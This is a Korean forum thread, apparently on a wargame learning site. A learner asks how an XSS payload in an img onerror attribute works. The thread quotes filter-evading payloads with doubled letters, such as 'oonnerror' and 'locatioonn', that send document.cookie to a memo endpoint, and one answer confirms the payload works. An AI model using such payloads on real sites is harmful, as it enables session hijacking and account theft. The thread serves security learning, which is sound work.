이미지 src와 onerror 차이?

<img src="" onerror="<scscriptript>...">
<img src="<scscriptript>..." onerror="">
왜 src속성에 하면 안되고 onerror 속성에 스크립트를 써야 되나여??

<img src="" oonnerror="locatioonn.href=+'/memo?memo='+document.cookie">
<img src="" oonnerror="locatioonn.href='/memo?memo='+document.cookie">

두 코드의 차이점은 무엇인가요? +를 왜 뒤에만 붙여야 적용 되는건가요??

#web
작성자 정보
답변 2
appler
대표 업적 없음

구글에 " img src란? " 이렇게만 검색해보셔도 답이 나올 것 같습니다.

그리고 익스코드는 <img src="" oonnerror="locatioonn.href='/memo?memo='+document.cookie">
이렇게 적으신거 그대로 되시는데 어디 +를 말하시는건지 모르겠네요

2023.08.24. 20:26
roronoa
대표 업적 없음

src는 url, onerror는 url에서 이미지 못찾으면 에러띄우는건데 스크립트 삽입하면 스크립트 공격가능

2023.08.24. 23:56
질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기